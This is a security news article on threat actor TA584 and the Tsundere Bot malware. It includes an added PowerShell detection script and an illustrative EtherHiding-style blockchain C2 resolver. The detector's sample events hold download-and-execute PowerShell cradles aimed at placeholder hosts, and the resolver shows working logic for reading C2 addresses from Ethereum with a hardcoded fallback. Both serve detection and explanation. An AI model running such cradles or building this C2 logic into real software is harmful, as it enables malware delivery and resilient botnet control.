
Hackers Now Use Tsundere Bot for Ransomware Attacks

Summary

– TA584, a prolific initial access broker, is using Tsundere Bot and XWorm malware to gain network access, which researchers assess could lead to ransomware attacks.
– The threat actor’s campaign volume tripled in late 2025, expanding its geographic targeting to include Germany, other European countries, and Australia beyond its usual North American and UK/Ireland focus.
– TA584’s attack chain uses emails from compromised accounts, unique URLs with geofencing, and redirects through traffic direction systems, leading to a page that tricks targets into running a malicious PowerShell command.
– Tsundere Bot is a malware-as-a-service platform that uses the Ethereum blockchain for command-and-control communication, avoids infecting systems in CIS countries, and has capabilities for data theft and acting as a proxy.
– Proofpoint researchers expect TA584 to continue targeting a broader range of victims and experimenting with various malware payloads in its operations.

Cybersecurity researchers have identified a significant escalation in the operations of a threat actor tracked as TA584, which is now deploying a combination of Tsundere Bot and the XWorm remote access trojan to establish initial access in corporate networks. Proofpoint assesses with high confidence that this access can lead to ransomware deployment, posing a severe risk to organizations globally. The group’s campaign volume tripled in late 2025, and its geographic focus expanded beyond North America, the UK and Ireland to include Germany, Australia, and other European nations.

Proofpoint, which has monitored TA584 since 2020, reports the actor has refined a multi-stage attack chain designed to evade static security defenses. The process typically starts with phishing emails dispatched from hundreds of compromised, aged email accounts through services like SendGrid and Amazon SES. Each recipient receives a unique URL, and the infrastructure behind it is gated by geofencing and IP filtering, which screens out automated scanners and visitors outside the targeted regions. Potential victims are then routed through complex redirect chains, often managed by traffic direction systems such as Keitaro.

Visitors who pass the initial filters encounter a CAPTCHA page, followed by a deceptive “ClickFix” page. This page instructs the target to copy and execute a specific PowerShell command, the step that turns a page visit into an infection. The command downloads and runs an obfuscated script that loads either the XWorm trojan or Tsundere Bot directly into memory, leaving no payload file on disk. To reduce suspicion, the browser is then redirected to a legitimate website.
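The article does not reproduce the exact command, so the following is an added detection example (not code from Proofpoint or the original article) that shows what a defender can do with the behaviour described: score PowerShell process-creation events for the ClickFix pattern of an interactive parent (explorer.exe, which is what spawns a command pasted into the Run dialog), stealth flags, and a download-and-execute cradle, including cradles hidden inside an `-EncodedCommand` argument. The sample events are constructed, and the URLs in them are placeholders.

```python
"""Flag ClickFix-style PowerShell launches in process-creation telemetry (added example)."""
import base64
import re

# Download-and-execute cradle keywords commonly seen in pasted one-liners.
DOWNLOAD_CRADLE = re.compile(
    r"(invoke-expression|\biex\b|downloadstring|downloadfile|invoke-webrequest"
    r"|\biwr\b|\birm\b|invoke-restmethod|net\.webclient|start-bitstransfer)",
    re.I,
)
# Flags that hide the window or disable safeguards; benign admin scripts rarely need all of them.
HIDING_FLAGS = re.compile(
    r"(-w(indowstyle)?\s+h(idden)?\b|-nop\b|-noprofile\b|-noni\b|-noninteractive\b"
    r"|-ep\s+bypass\b|-executionpolicy\s+bypass\b)",
    re.I,
)
# -e / -enc / -EncodedCommand followed by a base64 blob (UTF-16LE script).
ENCODED = re.compile(r"-e(nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)

_PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
# Constructed sample: a cradle wrapped in -enc, the way many ClickFix lures deliver it.
_ENC_SAMPLE = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s.txt')"
    .encode("utf-16le")
).decode()

# Constructed Sysmon Event ID 1 style records; not real telemetry.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": _PS,
     "CommandLine": 'powershell -w hidden -c "iex (iwr http://example.invalid/x).Content"'},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": _PS,
     "CommandLine": f"powershell -nop -w hidden -ep bypass -enc {_ENC_SAMPLE}"},
    {"ParentImage": r"C:\Windows\System32\svchost.exe", "Image": _PS,   # scheduled task, benign
     "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\inventory.ps1"},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": _PS,           # user opened a console
     "CommandLine": "powershell.exe"},
]


def decode_encoded_command(cmdline: str) -> str:
    """Return the decoded -EncodedCommand payload, or '' if there is none or it is malformed."""
    m = ENCODED.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(2)).decode("utf-16le", errors="replace")
    except (ValueError, UnicodeDecodeError):
        return ""


def score_event(ev: dict) -> tuple[int, list[str]]:
    """Count independent ClickFix indicators on one PowerShell process-creation event."""
    image = ev.get("Image", "").lower()
    if not image.endswith(("powershell.exe", "pwsh.exe")):
        return 0, []
    cmd = ev.get("CommandLine", "")
    reasons = []
    if ev.get("ParentImage", "").lower().endswith("explorer.exe"):
        reasons.append("launched from Explorer / Run dialog")
    decoded = decode_encoded_command(cmd)
    if decoded:
        reasons.append("encoded command")
    if HIDING_FLAGS.search(cmd):
        reasons.append("stealth flags")
    if DOWNLOAD_CRADLE.search(cmd + "\n" + decoded):   # scan the decoded script too
        reasons.append("download cradle")
    return len(reasons), reasons


def flag_clickfix(events: list[dict], threshold: int = 3) -> list[tuple[int, list[str]]]:
    """Return (index, reasons) for events whose indicator count reaches the threshold."""
    hits = []
    for i, ev in enumerate(events):
        n, reasons = score_event(ev)
        if n >= threshold:
            hits.append((i, reasons))
    return hits


if __name__ == "__main__":
    for idx, why in flag_clickfix(SAMPLE_EVENTS):
        print(f"event {idx}: {', '.join(why)}")
```

Tune the threshold to your environment: the benign scheduled task above scores one indicator (ExecutionPolicy Bypass) and the plain console launch scores one (Explorer parent), while both lure-style commands score three or more. Decoding the encoded command matters because the cradle keywords are invisible in the raw command line otherwise.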

Tsundere Bot itself is a formidable malware-as-a-service platform with backdoor and loader functions. First documented by Kaspersky and linked to Russian-speaking operators, it requires Node.js to run and installs it automatically if absent. A notable feature is its command-and-control (C2) addressing: it retrieves C2 addresses from the Ethereum blockchain using a technique akin to EtherHiding, with a hardcoded backup address as a fallback, so taking down one address does not cut off the botnet. The malware communicates over WebSockets and aborts the infection if the system language is one used in Commonwealth of Independent States (CIS) countries, such as Russian, suggesting the operators wish to avoid compromising systems in those regions.
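To make the EtherHiding-style C2 lookup concrete, here is an added example (not Tsundere Bot's code, and not taken from the Kaspersky or Proofpoint reports) that shows the two parts of the mechanism: the `eth_call` JSON-RPC request a bot would send to a public Ethereum node to read a string from a contract, and the ABI decoding of the response with a hardcoded fallback when the read fails. The RPC endpoint, contract address, function selector, and both endpoints are placeholders; the responses are constructed so the example runs offline.

```python
"""EtherHiding-style C2 resolution with hardcoded fallback (added illustration)."""
import json

RPC_URL = "https://rpc.example.invalid"          # placeholder public Ethereum JSON-RPC node
CONTRACT = "0x" + "11" * 20                      # placeholder contract address
SELECTOR = "0xdeadbeef"                          # placeholder 4-byte selector of a string getter
FALLBACK_C2 = "wss://fallback.example.invalid/ws"  # placeholder hardcoded backup address


def build_eth_call(contract: str, selector: str, request_id: int = 1) -> dict:
    """The JSON-RPC body a bot POSTs to RPC_URL; this is the network artifact to look for."""
    return {"jsonrpc": "2.0", "id": request_id, "method": "eth_call",
            "params": [{"to": contract, "data": selector}, "latest"]}


def abi_encode_string(s: str) -> str:
    """ABI-encode a single string return value: offset word, length word, 32-byte padded data."""
    data = s.encode("utf-8")
    head = (32).to_bytes(32, "big")
    length = len(data).to_bytes(32, "big")
    padded = data + b"\x00" * ((32 - len(data) % 32) % 32)
    return "0x" + (head + length + padded).hex()


def abi_decode_string(hexstr: str) -> str:
    """Inverse of abi_encode_string; raises ValueError on truncated or malformed data."""
    raw = bytes.fromhex(hexstr[2:] if hexstr.startswith("0x") else hexstr)
    if len(raw) < 64:
        raise ValueError("response too short for an ABI string")
    offset = int.from_bytes(raw[:32], "big")
    if offset + 32 > len(raw):
        raise ValueError("offset points past end of data")
    length = int.from_bytes(raw[offset:offset + 32], "big")
    start = offset + 32
    if start + length > len(raw):
        raise ValueError("length exceeds data")
    return raw[start:start + length].decode("utf-8")


def resolve_c2(rpc_response: str, fallback: str = FALLBACK_C2) -> tuple[str, str]:
    """Return (c2_url, source). Any failure in the chain read silently yields the fallback."""
    try:
        resp = json.loads(rpc_response)
        if "error" in resp:
            return fallback, "rpc error"
        c2 = abi_decode_string(resp["result"])
        if not c2.startswith(("ws://", "wss://")):
            return fallback, "unexpected result"
        return c2, "blockchain"
    except (ValueError, KeyError, TypeError, UnicodeDecodeError):
        return fallback, "decode failure"


# Constructed node responses: a successful read, a reverted call, and an empty result.
SAMPLE_OK = json.dumps({"jsonrpc": "2.0", "id": 1,
                        "result": abi_encode_string("wss://c2.example.invalid/ws")})
SAMPLE_ERR = json.dumps({"jsonrpc": "2.0", "id": 1,
                         "error": {"code": -32000, "message": "execution reverted"}})
SAMPLE_EMPTY = json.dumps({"jsonrpc": "2.0", "id": 1, "result": "0x"})

if __name__ == "__main__":
    print(json.dumps(build_eth_call(CONTRACT, SELECTOR)))
    for sample in (SAMPLE_OK, SAMPLE_ERR, SAMPLE_EMPTY):
        print(resolve_c2(sample))
```

The defensive takeaways are in the two failure paths: an endpoint workstation POSTing `eth_call` bodies to a public Ethereum RPC provider is itself an anomaly worth alerting on, and blocking that traffic only pushes the bot onto its hardcoded fallback, so the block should be paired with a watch for the fallback connection rather than treated as a fix.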

Once installed, Tsundere Bot gathers extensive system information, can run arbitrary JavaScript code from its controllers, and can turn infected machines into SOCKS proxies for further malicious activity. The platform even includes an internal marketplace where access to these compromised “bots” can be bought and sold. Proofpoint assesses with high confidence that infections involving this malware can lead directly to ransomware deployment, given TA584’s established patterns.

Historically, TA584 has utilized a wide array of payloads including Ursnif, Cobalt Strike, and DCRAT. Researchers anticipate this actor will continue to experiment with new payloads and broaden its target range. This evolving threat underscores the need for organizations to enhance defenses against social engineering and to monitor for suspicious PowerShell activity, which remains a cornerstone of this aggressive attack chain.

(Source: Bleeping Computer)
